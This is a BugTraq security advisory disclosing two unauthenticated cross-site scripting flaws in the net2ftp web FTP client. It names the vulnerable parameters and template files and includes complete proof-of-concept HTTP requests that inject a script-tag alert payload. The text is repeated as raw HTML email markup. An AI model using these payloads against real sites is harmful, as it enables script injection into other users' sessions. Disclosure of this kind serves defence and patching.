BugTraq
[0day] net2ftp multiple XSS on unauthenticated users Aug 05 2016 02:19AM
Jacobo Avariento (jacobo sofistic com)
*Summary*

Subject: net2ftp XSS in "command" and "url_withpw" parameters

Versions vulnerable: ALL (Tested on latest, version 1.0)

Category: 0-day

Impact: Medium

*Description of the product*

net2ftp is a web based FTP client (_http://www.net2ftp.com/index.php_
<http://www.net2ftp.com/index.php>). It can be used as a standalone version and also integrated in some web platforms as ISP providers, e-commerce sites and other websites.

*Description of the vulnerabilities*

Doing a vulnerability research on net2ftp, latest version 1.0. Jacobo Avariento had found several cross-site scripting (XSS) found in _skins/shinra/bookmark1.template.php_ (line 18) "url_withpw" parameter, and in _skins/shinra/raw1.template.php_ (line 5) with "command" parameter.

The first, parameter "url_withpw" is triggered when the user is placing a bookmark on that FTP connection.

The second, parameter "command", is triggered when the user access the FTP interactive mode for sending FTP arbitrary commands to the server.

*Proof of concept*

--- Parameter "command" ---

POST /net2ftp_v1.0/files_to_upload/index.php HTTP/1.1
Host: 192.168.1.103
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: _http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.php_
<http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.php>
Cookie: net2ftpcookie_ftpserver=192.168.1.103; net2ftpcookie_ftpserverport=21; net2ftpcookie_username=anonymous; net2ftpcookie_language=en; net2ftpcookie_skin=shinra; net2ftpcookie_ftpmode=automatic; net2ftpcookie_passivemode=no; net2ftpcookie_protocol=FTP; net2ftpcookie_viewmode=list; net2ftpcookie_directory=%2F; PHPSESSID=HNM7kDAFz3Gpi%2CCUYHlUEt5nlmf
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 391

ftpserver=192.168.1.103&ftpserverport=21&username=anonymous&language=en&
skin=shinra&ftpmode=automatic&passivemode=no&protocol=FTP&viewmode=list&
sort=&sortorder=&state=raw&state2=main&directory=%2F&screen=&*command=*C
WD+%0D%0APWD%0D%0A*%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22Sofistic%22%2
9%3B%3C%2Fscript%3E*&text=501+Invalid+number+of+arguments%0D%0A257+%22%2
F%22+is+the+current+directory%0D%0A

----------------------------------------

--- Parameter "url_withpw" ---

POST /net2ftp_v1.0/files_to_upload/index.php HTTP/1.1
Host: 192.168.1.103
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: _http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.php_
<http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.php>
Cookie: net2ftpcookie_ftpserver=192.168.1.103; net2ftpcookie_ftpserverport=21; net2ftpcookie_username=anonymous; net2ftpcookie_language=en; net2ftpcookie_skin=shinra; net2ftpcookie_ftpmode=automatic; net2ftpcookie_passivemode=no; net2ftpcookie_protocol=FTP; net2ftpcookie_viewmode=list; net2ftpcookie_directory=%2F; PHPSESSID=HNM7kDAFz3Gpi%2CCUYHlUEt5nlmf
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1141

ftpserver=192.168.1.103&ftpserverport=21&username=anonymous&language=en&
skin=shinra&ftpmode=automatic&passivemode=no&protocol=FTP&viewmode=list&
sort=&sortorder=&state=bookmark&state2=main&directory=%2F&*url_withpw=*%
2Fnet2ftp_v1.0%2Ffiles_to_upload%2Findex.php%3Fftpserver%3D192.168.1.103
%26amp%3Bftpserverport%3D21%26amp%3Busername%3Danonymous%26amp%3Bpasswor
d_encrypted%3D%26amp%3Blanguage%3Den%26amp%3Bskin%3Dshinra%26amp%3Bftpmo
de%3Dautomatic%26amp%3Bpassivemode%3Dno%26amp%3Bprotocol%3DFTP%26amp%3Bv
iewmode%3Dlist%26amp%3Bsort%3D%26amp%3Bsortorder%3D%26amp%3Bstate%3Draw%
26amp%3Bstate2%3Dmain%26amp%3Bdirectory%3D%252F%26amp%3Bentry%3D*%22%3C%
2Fa%3E%3Cscript%3Ealert%28%22Sofistic%22%29%3B%3C%2Fscript%3E*&url_witho
utpw=%2Fnet2ftp_v1.0%2Ffiles_to_upload%2Findex.php%3Fftpserver%3D192.168
.1.103%26amp%3Bftpserverport%3D21%26amp%3Busername%3Danonymous%26amp%3Bl
anguage%3Den%26amp%3Bskin%3Dshinra%26amp%3Bftpmode%3Dautomatic%26amp%3Bp
assivemode%3Dno%26amp%3Bprotocol%3DFTP%26amp%3Bviewmode%3Dlist%26amp%3Bs
ort%3D%26amp%3Bsortorder%3D%26amp%3Bstate%3Dlogin_small%26amp%3Bstate2%3
Dbookmark%26amp%3Bgo_to_state%3Draw%26amp%3Bgo_to_state2%3Dmain%26amp%3B
directory%3D%252F%26amp%3Bentry%3D&text=net2ftp+192.168.1.103

----------------------------------------

*Impact*

Due to a possible lack of validation of cookie and session parameters it is possible to trigger the attacks directly, without need to log in in the server or the website.

Because of this circumstances, the risk of the vulnerability is tagged as "medium" as there is no authentication and can be triggered in any net2ftp software online. It has been proved that several ISP providers use this software for their clients, among other customers.

*Timeline*

Jul 24/2016: The vendor has been already contacted, no reply until date of public diclosure.

*Actions***

We recommend all sysadmins and web developers who are using net2ftp software to review the files _skins/shinra/bookmark1.template.php_ and _skins/shinra/raw1.template.php_ manually, and patch the XSS because no official patches are released or planned yet.

*Contact***

Jacobo Avariento

Jacobo -*- sofistic -*- com

-----------------------------------------------
Jacobo Avariento
Cybersecurity Consultant / Pentester

Sofistic S.A., Panama City

<html>
<head>

<meta http-equiv="content-type" content="text/html; charset=utf-8">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<p><b><span style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt">Summary</span></b><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">Subject: net2ftp XSS in "<wbr>command" 
and "url_withpw" <wbr>parameters</span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">Versions vulnerable: ALL (<wbr>Tested on
 latest, version 1.0)</span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">Category: 0-day</span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">Impact: Medium</span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><b><span style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt">Description of the produ
ct</span></b><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">net2ftp </span><span
style="font-family:"Times New Roman";font-size:12pt">is </span><span
style="font-family:"Times New Roman";font-size:12pt">a web based FTP <wbr>client (</span><sp
an><a
href="http://www.net2ftp.com/index.php" target="_blank"
data-saferedirecturl="https://www.google.com/url?hl=en&q=http://www.
net2ftp.com/index.php&source=gmail&ust=1470449209638000&usg=
AFQjCNHCgCy-uLvimt5q4l7h4pa_Aq3L8Q"><u><span
style="font-family:"Times New
Roman";color:rgb(0,0,255);text-decoration:underline">http://www.net
2ftp.<wbr>com/index.php</span></u></a></span><span
style="font-family:"Times New Roman";font-size:12pt">)</span><span
style="font-family:"Times New Roman";font-size:12pt">. It can be <wbr>used as a standalone
 version <wbr>and also integrated in some <wbr>web platforms as
 ISP <wbr>providers, e-commerce sites <wbr>and other websites.</s
pan><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><b><span style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt">Description of the <wbr>
vulnerabilities</span></b><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">Doing a vulnerability <wbr>research on 
net2ftp, latest <wbr>version 1.0. </span><span
style="font-family:"Times New Roman";font-size:12pt">Jacobo Avariento</span><span
style="font-family:"Times New Roman";font-size:12pt"> <wbr>ha</span><span
style="font-family:"Times New Roman";font-size:12pt">d</span><span
style="font-family:"Times New Roman";font-size:12pt"> found several cross-site <wbr>scripting
 (XSS) found in </span><u><span
style="font-family:"Times New
Roman";text-decoration:underline;font-size:12pt">skins<wbr>/shinra/
bookmark1.template.php</span></u><span
style="font-family:"Times New Roman";font-size:12pt"><wbr> (line 18) "url_withpw" <wbr>parame
ter, and in </span><u><span
style="font-family:"Times New
Roman";text-decoration:underline;font-size:12pt">skins/<wbr>shinra/
raw1.template.php</span></u><span
style="font-family:"Times New Roman";font-size:12pt"> (<wbr>line 5) with "command" <wbr>para
meter.</span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">The first, parameter "url_<wbr>withpw" i
s triggered when the <wbr>user is placing a bookmark on <wbr>t
hat FTP connection.</span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">The second, parameter "<wbr>command", is
 triggered when <wbr>the user access the FTP <wbr>interactive m
ode for sending <wbr>FTP arbitrary commands to the <wbr>server.<
/span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><b><span style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt">Proof of concept</span></
b><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">--- Parameter "command" ---</span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">POST /net2ftp_v1.0/files_to_<wbr>upload/ind
ex.php HTTP/1.1 </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Host: 192.168.1.103 </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">User-Agent: Mozilla/5.0 (X11; <wbr>Fedora
; Linux x86_64; rv:47.0)<wbr> Gecko/20100101 Firefox/47.0 </span><
span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Accept: text/html,application/<wbr>xhtml+xm
l,application/xml;q=0.<wbr>9,*/*;q=0.8 </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Accept-Language: en-US,en;q=0.<wbr>5 </spa
n><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Accept-Encoding: gzip, <wbr>deflate </spa
n><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Referer: </span><span><a
href="http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.php"
target="_blank"
data-saferedirecturl="https://www.google.com/url?hl=en&q=http://192.
168.1.103/net2ftp_v1.0/files_to_upload/index.php&source=gmail&us
t=1470449209638000&usg=AFQjCNFaFzJ2UqihnESb5nZNBSxL-7qukA"><u><span
style="font-family:"Times New
Roman";color:rgb(0,0,255);text-decoration:underline">http://192.168
.1.103/<wbr>net2ftp_v1.0/files_to_upload/<wbr>index.php</span></u></a></
span><span
style="font-family:"Times New Roman";font-size:12pt"> </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Cookie: net2ftpcookie_<wbr>ftpserver=192.16
8.1.103; <wbr>net2ftpcookie_ftpserverport=<wbr>21; net2ftpcookie_usern
ame=<wbr>anonymous; net2ftpcookie_<wbr>language=en; net2ftpcookie_<wbr
>skin=shinra; net2ftpcookie_<wbr>ftpmode=automatic; <wbr>net2ftpcookie
_passivemode=no; <wbr>net2ftpcookie_protocol=FTP; <wbr>net2ftpcookie_v
iewmode=list; <wbr>net2ftpcookie_directory=%2F; <wbr>PHPSESSID=HNM7kDA
Fz3Gpi%<wbr>2CCUYHlUEt5nlmf </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Connection: close </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Content-Type: application/x-<wbr>www-form-u
rlencoded </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Content-Length: 391 </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt"> </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">ftpserver=192.168.1.103&<wbr>ftpserverpo
rt=21&username=<wbr>anonymous&language=en&skin=<wbr>shinra&a
mp;ftpmode=automatic&<wbr>passivemode=no&protocol=FTP&<wbr>v
iewmode=list&sort=&sortorder=<wbr>&state=raw&state2=main
&<wbr>directory=%2F&screen=&</span><b><span
style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt">command=</span></b><span
style="font-family:"Times New Roman";font-size:12pt"><wbr>CWD+%0D%0APWD%0D%0A</span><b><span
style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt">%3C%<wbr>2Ftextarea%3E%3Csc
ript%<wbr>3Ealert%28%22Sofistic%22%29%<wbr>3B%3C%2Fscript%3E</span></b><
span
style="font-family:"Times New Roman";font-size:12pt">&text=501+<wbr>Invalid+number+of+argumen
ts%<wbr>0D%0A257+%22%2F%22+is+the+<wbr>current+directory%0D%0A</span><sp
an
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">------------------------------<wbr>---------
-</span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt"> </span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">--- Parameter "url_withpw" ---</span><spa
n
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">POST /net2ftp_v1.0/files_to_<wbr>upload/ind
ex.php HTTP/1.1 </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Host: 192.168.1.103 </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">User-Agent: Mozilla/5.0 (X11; <wbr>Fedora
; Linux x86_64; rv:47.0)<wbr> Gecko/20100101 Firefox/47.0 </span><
span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Accept: text/html,application/<wbr>xhtml+xm
l,application/xml;q=0.<wbr>9,*/*;q=0.8 </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Accept-Language: en-US,en;q=0.<wbr>5 </spa
n><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Accept-Encoding: gzip, <wbr>deflate </spa
n><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Referer: </span><span><a
href="http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.php"
target="_blank"
data-saferedirecturl="https://www.google.com/url?hl=en&q=http://192.
168.1.103/net2ftp_v1.0/files_to_upload/index.php&source=gmail&us
t=1470449209639000&usg=AFQjCNHrfk8BpA29ZWEPDSOyg-GZtEL7GA"><u><span
style="font-family:"Times New
Roman";color:rgb(0,0,255);text-decoration:underline">http://192.168
.1.103/<wbr>net2ftp_v1.0/files_to_upload/<wbr>index.php</span></u></a></
span><span
style="font-family:"Times New Roman";font-size:12pt"> </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Cookie: net2ftpcookie_<wbr>ftpserver=192.16
8.1.103; <wbr>net2ftpcookie_ftpserverport=<wbr>21; net2ftpcookie_usern
ame=<wbr>anonymous; net2ftpcookie_<wbr>language=en; net2ftpcookie_<wbr
>skin=shinra; net2ftpcookie_<wbr>ftpmode=automatic; <wbr>net2ftpcookie
_passivemode=no; <wbr>net2ftpcookie_protocol=FTP; <wbr>net2ftpcookie_v
iewmode=list; <wbr>net2ftpcookie_directory=%2F; <wbr>PHPSESSID=HNM7kDA
Fz3Gpi%<wbr>2CCUYHlUEt5nlmf </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Connection: close </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Cache-Control: max-age=0 </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Content-Type: application/x-<wbr>www-form-u
rlencoded </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">Content-Length: 1141 </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt"> </span><span
style="font-family:"Times New Roman";font-size:12pt"><br>
</span><span style="font-family:"Times New
Roman";font-size:12pt">ftpserver=192.168.1.103&<wbr>ftpserverpo
rt=21&username=<wbr>anonymous&language=en&skin=<wbr>shinra&a
mp;ftpmode=automatic&<wbr>passivemode=no&protocol=FTP&<wbr>v
iewmode=list&sort=&sortorder=<wbr>&state=bookmark&state2
=main&<wbr>directory=%2F&</span><b><span
style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt">url_withpw=</span></b><span

style="font-family:"Times New Roman";font-size:12pt">%<wbr>2Fnet2ftp_v1.0%2Ffiles_to_<wbr>upload%
2Findex.php%<wbr>3Fftpserver%3D192.168.1.103%<wbr>26amp%3Bftpserverport%
3D21%<wbr>26amp%3Busername%3Danonymous%<wbr>26amp%3Bpassword_encrypted%3
D%<wbr>26amp%3Blanguage%3Den%26amp%<wbr>3Bskin%3Dshinra%26amp%<wbr>3Bftp
mode%3Dautomatic%26amp%<wbr>3Bpassivemode%3Dno%26amp%<wbr>3Bprotocol%3DF
TP%26amp%<wbr>3Bviewmode%3Dlist%26amp%<wbr>3Bsort%3D%26amp%3Bsortorder%<
wbr>3D%26amp%3Bstate%3Draw%26amp%<wbr>3Bstate2%3Dmain%26amp%<wbr>3Bdirec
tory%3D%252F%26amp%<wbr>3Bentry%3D</span><b><span
style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt">%22%3C%2Fa%3E%<wbr>3Cscript
%3Ealert%28%<wbr>22Sofistic%22%29%3B%3C%<wbr>2Fscript%3E</span></b><span

style="font-family:"Times New Roman";font-size:12pt">&url_withoutpw=%<wbr>2Fnet2ftp_v1.0%2Ffi
les_to_<wbr>upload%2Findex.php%<wbr>3Fftpserver%3D192.168.1.103%<wbr>26a
mp%3Bftpserverport%3D21%<wbr>26amp%3Busername%3Danonymous%<wbr>26amp%3Bl
anguage%3Den%26amp%<wbr>3Bskin%3Dshinra%26amp%<wbr>3Bftpmode%3Dautomatic
%26amp%<wbr>3Bpassivemode%3Dno%26amp%<wbr>3Bprotocol%3DFTP%26amp%<wbr>3B
viewmode%3Dlist%26amp%<wbr>3Bsort%3D%26amp%3Bsortorder%<wbr>3D%26amp%3Bs
tate%3Dlogin_<wbr>small%26amp%3Bstate2%<wbr>3Dbookmark%26amp%3Bgo_to_<wb
r>state%3Draw%26amp%3Bgo_to_<wbr>state2%3Dmain%26amp%<wbr>3Bdirectory%3D
%252F%26amp%<wbr>3Bentry%3D&text=net2ftp+192.<wbr>168.1.103</span><s
pan
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">------------------------------<wbr>---------
-</span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><b><span style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt">Impact</span></b><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">Due to a possible lack of <wbr>validat
ion of cookie and <wbr>session parameters it is <wbr>possible t
o trigger the <wbr>attacks directly, without <wbr>need to log i
n in the server <wbr>or the website.</span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">Because of this circumstances,<wbr> theÂ
 risk of the <wbr>vulnerability is tagged as "<wbr>medium" as t
here is no <wbr>authentication and can be <wbr>triggered in any
 net2ftp <wbr>software online. It has been <wbr>proved that sev
eral ISP <wbr>providers use this software <wbr>for their clients
, among <wbr>other customers.</span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><b><span style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt">Timeline</span></b><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><span style="font-family:"Times New
Roman";font-size:12pt">Jul 24/2016: The vendor has <wbr>been 
already contacted</span><span
style="font-family:"Times New Roman";font-size:12pt">, no <wbr>reply until date of public 
<wbr>diclosure.</span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><b><span style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt">Actions</span></b><b><span
style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt"></span></b></p>
<p><span style="font-family:"Times New
Roman";font-weight:normal;font-size:12pt">We recommend all sysad
mins <wbr>and web developers who are <wbr>using net2ftp software
 to <wbr>review the files </span><u><span
style="font-family:"Times New
Roman";text-decoration:underline;font-size:12pt">skins/shinra/<wbr>
bookmark1.template.php</span></u><span
style="font-family:"Times New Roman";font-size:12pt"> </span><span
style="font-family:"Times New Roman";font-size:12pt">and</span><span
style="font-family:"Times New Roman";font-size:12pt"> </span><u><span
style="font-family:"Times New
Roman";text-decoration:underline;font-size:12pt">ski<wbr>ns/shinra/
raw1.template.php</span></u><span
style="font-family:"Times New Roman";font-size:12pt"> <wbr>manually, and patch the XSS <wbr
>because no official patches <wbr>are released or planned yet.</
span><span
style="font-family:"Times New Roman";font-size:12pt"></span></p>
<p><b><span style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt">Contact</span></b><b><span
style="font-family:"Times New
Roman";font-weight:bold;font-size:12pt"></span></b></p>
<p><span style="font-family:"Times New
Roman";font-weight:normal;font-size:12pt">Jacobo Avariento</span><
span
style="font-family:"Times New
Roman";font-weight:normal;font-size:12pt"></span></p>
<span style="font-family:"Times New
Roman";font-weight:normal;font-size:12pt">Jacobo -*- sofistic -*
- com<br>
<br>
<br>
<br>
<br>
<br>
-----------------------------------------------<br>
Jacobo Avariento<br>
Cybersecurity Consultant / Pentester<br>
<br>
Sofistic S.A., Panama City<br>
<br>
<br>
</span>
</body>
</html>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIxBAEBCAAbBQJXo/eyFBxqYWNvYm9Ac29maXN0aWMuY29tAAoJEA/4//NFCmRr
11kQALWQRVm4mEFMvH5wZ2k8Hi3YkDf9Nhyn7FOmqf0p3OE2WruzfQgC1WSUqQ7L
eqSQYr+z2vFrwnCeZmVaP+Fq2CrlU4Q/9s98VTA1SEIvj59IhFlDgvcd5rgvNjfB
K2oEowHRwEeXjg1nkVf1TQ+ISaE9Eus7QV4WFpexPmPvcqRU3+XhCwLAW9KmGuwz
+pt9XqGf/aDlecnYQ5zzXTFn0Pfa+hAPxsTBKsVSMKITqdceFO/rz1RLryoHp2u6
Malj53i0N7TD7Y+hbyWV6+U4Yg6/6Yax34prJlSpqh9IL/s06G1EkMcioHtO3r55
HYdM4bAqF3tgU+DwBApzpXiM3srJhq/8NMwqb5o1Q9OnwlGuCetKNMDbyGwnBlCn
mCgbzFqT/fY/kw6d6aPgrmmHkZyB8VrYW8QwKxt1dAnpt3K7X7UgBQM6ebo255O/
+WgcnWkt+8QLcQB0GRfaw4Ho8OXDQ8JuaxI5Mh6cXJr7mmjkdN9PkK/VvOaBCD0c
AB/5CK3kgzMpb4lM/6jVmdso5g1DfOkuNxSRFghi2TMN3lZ6J16D/H7NVD/PO7rL
WG+bLSgVP4T88/xag59lBN9ObTx3xsUgKY19FGrNhhcHj3tfBnDlKda7tTT8bPIO
v/aOwuf1kDz6e5DVyUhQNEngH1iEIDIckF66JK4s/+kNQspC
=yJVG
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus